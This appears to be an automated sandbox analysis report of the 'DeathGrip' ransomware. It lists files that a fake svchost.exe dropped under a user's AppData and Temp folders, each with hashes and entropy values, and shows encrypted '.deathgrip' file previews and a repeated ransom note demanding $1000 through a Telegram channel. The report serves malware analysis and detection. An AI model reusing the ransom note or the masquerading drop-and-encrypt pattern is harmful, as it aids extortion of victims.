                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.97813356935928
                                                          Encrypted:false
                                                          SSDEEP:192:gJb4aSEwIG2rBVr5SjEZxVLTXTvJoBx8rinn6EI57G0Qz5+n8WJjaM:g91yIycLTXTvax8rG6LG0Q1+8WkM
                                                          MD5:CB65FFDC3D4C9BAA7EBACBEC89E426D2
                                                          SHA1:0DE590DEF42762CF89C0A51A40EC534E6459A288
                                                          SHA-256:C5D220C78C28829F70BCE44AE17293AEA3FCFC209898787060B64C482BB85826
                                                          SHA-512:3924F1A6193B972D2B4A6659E644F84DCC0846EC964AA79F98E6D76A0E6FF078DE3E99587FE14FB2FF4D8972BDCCB9180535A9BC03CE918BFE62DC879DB3923F
                                                          Malicious:false
                                                          Preview:.........]Xs./...6.+ .... .c.........Co.t..g...Z...?.....;05q.c...B..5............W7....h..$....o...yFj...p.V.[.2J..q.k..<z.I.1.np...H8.B.....:...g....W.)...S.....T..q.T..,E..8......G....`c...g..g<...<...5........}.[d*'5..:JD.BB?.".6%.-..}<tP..,.'..P6....._..'p.\4...[......{.>U..m..i.6.h.1.......9~.8M.....Pm>.'X.....O.._0....X.J.i...D.!...|io......6.P!.)*.a7..F...H......$t....zu...%.......&.t.t.&..zy..@.[I.....#..Rn...+0...j..,........1.K..u..y}c.'...uV|..z...^..'..W..A..X..z.zB...:..@9....I....J%.l.S.....b.]3t..s..O........D+.W.........W.R....\0....6.D25.p..5o...U.w.~.\...mpa..pP..|......6...F....Z.$.8.hQ........&B.Rmli.@.L..5..((f...`H.E5.[.&..m.j.r3.....WV......Y..El...o..J^..%E$.M...%.I..E..&l....x..8.`...a.S`..?..o..]6QJ..........Z......N...}#....J.\.1..I....|.b.dr.g...(......pfD.".X..Y5...*.YA_6L....$.IT$....o...K/.......eR.81..L....c.r......*.NA.qq....Ub....".H.$...B..0.........B.Nk.+.....C..@....'.j.+Iq.~l.....q...&.....rV.*

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):45024
                                                          Entropy (8bit):7.996057261558134
                                                          Encrypted:true
                                                          SSDEEP:768:/dLWKSknxAQBlbmXsN28Fkmh375LUJ4sm5GU/gXlql0I8qE2S42DSmk:/dLWzkxAwlbXPCjUInIDE2SsF
                                                          MD5:7BD4FF15FE923BA6F1CB1BF28595ED2A
                                                          SHA1:B8CB57E0ADD2A3C5A9215EF299F2AB449DF87A2A
                                                          SHA-256:039D8CBCD27589C75C60DA4B37D331B3CC15FBF810F1A2BB8CDDD96CFA0EE538
                                                          SHA-512:0F22316FE213F6E66703141204F0DB21BF930DF684678C1CD9C0DD8375D1089E95A1FFBB388A978B97759B27E22B1570C74BAF3AD7D01B1A132CB45E6F1A50FD
                                                          Malicious:true
                                                          Preview:........6..*.St........Kg.t5...b.....z.+/.........$......f.c......j....'....An?.{f.S{.;.f.%...d.i...8...!*Q.b\.v..,S..f)..p."....U..qz...9..%..mY..s.g,..Q..1.:...h.p..I(.F&........kF.W.......3.bPv*...!...PT2{f.....}.#.E?.{..a]p..n..-..T......T....... kQ)@."r..C....f.m9).L..<.Tn...a.T`bg...`..y.8D....9..EQ.?$G........ .S..c...2......E{d..N.0#...0......"...tW..s.)B._:.1.6vC...'Q`%..L.'..|..B/.i:....w.....z;......z.*gf..y...u....d.E@l.?.^..;...X.1.6..EB.hsKY_.......f...3R.. ....W.%q.7....p.$G..5.B.ey....b..3.^m.O..M..I7B...UcX.7o...%.j.is.....2.......M..Z_.sv.T..l.Z< ml......T..E4T...&..J?..?r....9p./a.^H...U{..n0..)...;....P...B..o...$0.R..m..I.....*.d.J.s..Mi.u. ...&I.........9....0....,..)......!J.....m{..;..)..]c..kh...c!Vl]....j.M......mc.G.L.y..+<...cE..e.1.~.A. A..w...x......z.5..~.O./......4...F...R{.*b.....7C.vO....H.8=`.q.....z..B...|..;h....>..t.B.q.^.....id.....8.U&....6..w.Z.S...M......z.'Pb.U<.....3.($.uX;.D6>:.ZGKx.

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_3_PNGEncoded_Data.bin

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_3_PNGEncoded_Data.bin.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_3_PNGEncoded_Header.bin

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_3_PNGEncoded_Header.bin.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetHistory\BackgroundTransferApi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.974320509213886
                                                          Encrypted:false
                                                          SSDEEP:192:YK7/zfSF4P6U1hYoHTxKE+HitOirsPtAZ3zYZdfTXmQezqCSi7:d7jSFo6uhY8NK6tLomAdfTXmQALSs
                                                          MD5:AE08855151679841809FB4D2CC5BD5FB
                                                          SHA1:E95588A3C3A425744EF86454F9B40CE8B66EC47B
                                                          SHA-256:A4A3B911EC7E41703C2FCED57E0F6B3C43C21AF8F3A330B8E181A25956F627AC
                                                          SHA-512:7BE5768B610DA6B682DD4D9562048110ECCFB68B5F6D347D7BD26296A2FBEDA2578CB13A1FC09D042115FF065FBA5BDD4EC4581EDD7D98D212162141460FC35E
                                                          Malicious:false
                                                          Preview:........u..+......Y.....FW. ~%.`....o.E...d.T...9.>...H3.|S...NF%.^..s....r.V..'..."sZ).2L<eI.K.0."Y.N..0./..@\.\......xH.:......5NL..A.z.O..w..9F8..=j..[.....rKb..d.1.Dy..oZ..9..Q5..04...k.....Q.../?[_...#....L..sQ..]....u....F...jP..U....&...J../Wc?e...,.#...q..........H......?b..i.2m%>..af.W*...6.pP~.eu.@m...i..V.91K.b....;.N|.p.4...8Pfk.^.....K5?:d..d.&}#n......BD..]..7..o.9...#.w.`[.......0...h.0.^.."W.?.BIf.rY...8....v..Z.*..Ly..t............%..g..W..(+eB.,.y/tT.b5..W:..z....4..P.\.&{%W..;.4R.H_c..K.X.0.H[.+.r....~.t.......R.+.cf\?L.?qm.....`&{..m..e.....T....R..9.2.JB0...6..|..e.b..4..L.4....k........!..(m..8..} .B..O.n8...W....b!....p&^....q.}t~5.j.30AL=........zp\.K.9..~7._F.4X ;Y./...r.m..Em.&...Ma..p.)....`..`......}.W..,l...{*X~..Kh.85.R.a..9..P...O.D.<l....wF.a%?$....>bK}...M.q..r.$.V....{.T.&=)`.|..(....k.......S..4.b.Fu..'7.G...c..pb.....s...1g..w..A.K....D.nD.;nJ.(h/q...K....jU=F.c.Iv.......Pj..41...E?...V...Y.Mn^..x......

                                                          C:\Users\jones\AppData\Local\Temp\AdobeARM.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\AdobeARM.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4384
                                                          Entropy (8bit):7.94423617676248
                                                          Encrypted:false
                                                          SSDEEP:96:wez6GnGJ5oWnHW6Q68e8xDp6Bwlxvv9kMvvx9/f88h0eO+Fbth:7z6Gnef2B1peIvuMv59/k4bth
                                                          MD5:4BC1F5162B8BF6FBCAF2529CD52573EB
                                                          SHA1:AF8425554B6524E61BD102F9B6D57658FD1A26B4
                                                          SHA-256:564CF7E0819F6436F4207D2EA40BB2DAD8A832AAC2F2D2C6605E40FCDB894E69
                                                          SHA-512:A712D83A644A87C1A3B0691A98EBDAAA2C0205F390AE367D5B039814D06B0AB7FE1E27F56FE34F41FD9922B2CCC54D42437F59DC980C2CE63FA5B4A0A77F5C06
                                                          Malicious:false
                                                          Preview:................dz......s.i.RP.%d..x.w......T.N..&S.vJ..s..X.0DnPe...c..\.1...e.....}B..].(....=.IVU..M.}...Q'.n..&?.w`...5...d.i.jVQ....Y...8...!x....F..xQ2.iot....o.q.......Q?8.....n`.p...D.?p.2....>Lm.&......D..~..w..eu)..)..9..$..|D. ,o+..+......Y.....ntp.?E..y.D....../.....\..9/}.`..-..9...k#..z.W....`:m..5...|..?.t%...M.......u....<k.9`z...?u.....T.f....J.F.=i0....~s..p.n..O;.G....e......#..7..^....w...."...X>V9#I3.zP..b"..'y..K..d.i...........X!w..7_.................ZHm.o.....M.9..6../q....9......r.|L.T..i*.5.=n;.9...O..}...~#p.......A5P.&..P...'...:.J.N(....;.....(..G......H&..3,...D&....r...y.jR.WI.....Z+**...(...=7...P.....0..c.d.g..-...C....H@w...O..3..,..*[.404......~.....7..."_..vi.@2...s.q8.yf1...!..........().#....^.~,tP*e..D...W.[.B.(Y.!\.A..7_.P.[A...$..V.tyt..G..!......D/[T(..T.Tx..$}.=.BU..........v.V.pj.].{.=.x....L..K.~.y.;...p...Jx.D......p......R....3.....SiR.0.D.........E0.Z.h....?..e[,.x)..[h|g.{1..W...Z...

                                                          C:\Users\jones\AppData\Local\Temp\acrobat_sbx\NGL\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12304
                                                          Entropy (8bit):7.983917713328329
                                                          Encrypted:false
                                                          SSDEEP:384:FXeINh/XXNzeZCECxjx1B8RXNc8Ap/5ebYGbGo3:DNh/XdPECP1B4XDicRao
                                                          MD5:18763CFBAB62ADB1532FC33F988BA93E
                                                          SHA1:E44D65F70820E53D57528E536032B4ADBCEF2E2D
                                                          SHA-256:4950F2FE7F31CA1B27EAA37DF1EC8E828B22BD0F5F97B109B53BD1722BDFE1BA
                                                          SHA-512:CB7BE167117714F680EAF6CA7941930FC47EE7673FC13AEC5555C71868113F851F41834AA7D7F0EA1A51B70999271E1959B758AFA5D17F4F34E776B6A38288DE
                                                          Malicious:false
